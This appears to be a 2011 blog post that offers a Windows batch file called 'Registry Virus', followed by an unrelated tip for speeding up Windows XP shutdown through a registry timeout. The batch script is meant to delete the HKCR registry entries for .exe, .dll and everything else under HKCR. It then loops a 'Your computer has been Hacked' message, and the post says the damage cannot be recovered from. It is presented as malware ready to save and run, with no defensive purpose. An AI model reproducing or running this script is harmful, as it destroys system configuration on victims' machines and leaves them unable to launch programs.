Sunday 15 May 2011

Registry Virus

-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)
(save this file with the name of RegistryVirus.bat)

@ECHO OFF
 START reg delete HKCR/.exe
 START reg delete HKCR/.dll
 START reg delete HKCR/*
 :MESSAGE
 ECHO Your computer has been Hacked.  Have a nice day.
 GOTO MESSAGE

FASTER SHUTDOWN

When a user shuts down Windows XP, first the system has to kill all services
currently running. Every once in a while the service does not shut down
instantly and windows gives it a change to shut down on its own before it kills it.
This amount of time that windows waits is stored in the system registry.
If you modify this setting, then windows will kill the service earlier. To modify
the setting, follow the directions below:
Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000(200 would be good)

Discussion Board

Followers